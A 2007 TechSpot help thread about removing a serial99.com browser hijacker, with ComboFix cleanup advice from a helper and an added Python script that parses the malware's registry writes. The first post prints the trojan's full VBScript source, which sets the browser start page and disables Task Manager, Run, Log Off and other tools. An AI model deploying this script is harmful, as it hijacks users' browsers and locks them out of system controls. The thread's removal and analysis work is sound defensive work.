TechSpot

Serial99 hijack

By M1245456
Nov 19, 2007
  1. Hi, I got the www serial99.com/?a infection where it redirected me to that url each time, it also disabled Run, Task manager, recent docs, etc.

    There is this new avpm.vbs file in my C drive, I don't know if I can just delete it or have to run a fix? (I just renamed it to .txt so you can look at it and my virus scanner says it's trojan.vbs.disabler.b):


    wscript.echo "Cracking... now! Click here for crack!"
    itemtype = "REG_SZ"
    mustboot = "www serial99.com"
    jobfunc = "CRACKED!"
    t = "Successfull!"
    Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
    Set Kaspersky = WScript.CreateObject("WScript.Shell")
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Window Title", "Serial99.com","REG_SZ"
    Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\www","www serial99.com/?","REG_SZ"
    Kaspersky.RegWrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
    Kaspersky.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
    Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRun", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogOff", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFind", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRecentDocsMenu", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoClose", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"



    -----------

    Rootkit scan didn't find anything
    I'm guessing to fix the recent docs etc. I just have to change these?:


    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
    "DisableRegistryTools"=0 (0x0)
    "DisableTaskMgr"=0 (0x0)

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
    "NoViewOnDrive"=0 (0x0)
    "NoLogoff"=1
    "NoRun"=1
    "NoFind"=1
    "NoRecentDocsMenu"=1
    "NoClose"=1


    ----------

    Also when I ran the AVG anti-spyware my Kaspersky picked up Backdoor.win32.sdbot.cic and deleted it.

    By the way, before I came to this site I ran DSS (Deckard's System Scanner), which I think is based on ComboFix, so I'm including the log as it shows the HijackThis stuff that was removed, and the stuff ComboFix would have done. (sry about this, I know u don't want extra logs)
     

    Attached Files:
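
Added example (not part of the original post or of the helper's instructions): a Python sketch that reads the script quoted above purely as text and lists which registry values it writes, grouped so the policy restrictions the poster asks about are separated from the browser settings. The category names and the `classify` heuristic are assumptions of this example; `SAMPLE` is an excerpt of the quoted script.

```python
import re

# Excerpt of the avpm.vbs text quoted in the post (the Start Page line repeats,
# as it does in the original). It is only ever handled as a string here.
SAMPLE = r'''
Set Kaspersky = WScript.CreateObject("WScript.Shell")
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRun", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
'''

# <object>.RegWrite "path", "data", "type"
REGWRITE = re.compile(r'\.RegWrite\s+"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"', re.I)

def parse_regwrites(script_text):
    """Return one record per distinct registry value the script writes."""
    seen = {}
    for path, data, reg_type in REGWRITE.findall(script_text):
        hive, _, rest = path.partition("\\")
        key, _, name = rest.rpartition("\\")
        key = key.rstrip("\\")  # the sample doubles the backslash before the value name
        ident = (hive.upper(), key.lower(), name.lower())
        seen.setdefault(ident, {"hive": hive.upper(), "key": key, "name": name,
                                "data": data, "type": reg_type.upper()})
    return list(seen.values())

def classify(entry):
    """Bucket a write by what it affects (heuristic assumed for this example)."""
    key = "\\" + entry["key"].lower() + "\\"
    if "\\policies\\" in key:
        return "policy restriction"
    if "\\internet explorer\\" in key or "\\url\\prefixes\\" in key:
        return "browser hijack"
    return "shell setting"

def triage(script_text):
    """Group the written values by category, as a cleanup checklist."""
    report = {}
    for e in parse_regwrites(script_text):
        report.setdefault(classify(e), []).append(f'{e["hive"]}\\{e["key"]} : {e["name"]}')
    return report

if __name__ == "__main__":
    for category, values in triage(SAMPLE).items():
        print(category)
        for v in values:
            print("   ", v)
```
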

  2. M1245456

    M1245456 TS Rookie Topic Starter

    hey, any help? :)
     
  3. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 24,177   +19

    Open notepad and copy/paste the text in the code box below into it:
    NOTE* make sure to only highlight and copy what is inside the quote box, nothing outside of it.
    Also ..

    Pay particular attention to this :-

    Make sure the word File:: is on the first line of the text file you save (no blank line above it, & no space in front of it)
    Code:



    Save this as CFScript.txt

    Then drag the CFScript.txt into ComboFix.exe as you see in the screenshot below.

    [​IMG]

    This will start ComboFix again. After reboot, (in case it asks to reboot), post the contents of Combofix.txt in your next reply together with a fresh HJT log.

    Regards Howard :)

    This thread is for the use of M1245456 only. Please don't post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  4. M1245456

    M1245456 TS Rookie Topic Starter

    Thx very much for help
     

    Attached Files:

  5. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 24,177   +19

    No, I need you to post a fresh Combofix log as an attachment.

    Regards Howard :)

     
  6. M1245456

    M1245456 TS Rookie Topic Starter

    Here u go

    - Martin
     

    Attached Files:

  7. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 24,177   +19

    That is not a full Combofix log.

    You need to run Combofix again and post the resulting log file.

    Regards Howard :)

     
  8. M1245456

    M1245456 TS Rookie Topic Starter

    Hi, combofix kept freezing on 'creating log', here's the dss scan (it doesn't seem to have created an extra.txt, just a main)
     
  9. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 24,177   +19

    Your log file looks fine.

    Unless you're still having problems, you should be good to go.

    Click start/run and type combofix /u into the run box and hit the enter key. That should delete Combofix and all its folders etc.

    Turn off system restore.(XP/ME only) See how HERE.

    Now, turn system restore back on. This will have deleted all your old restore points and any nasties that are in them. It will also have created a new, clean restore point.


    If you have any further virus/spyware problems, please post in this thread.

    Regards Howard :)

     
Topic Status:
Not open for further replies.
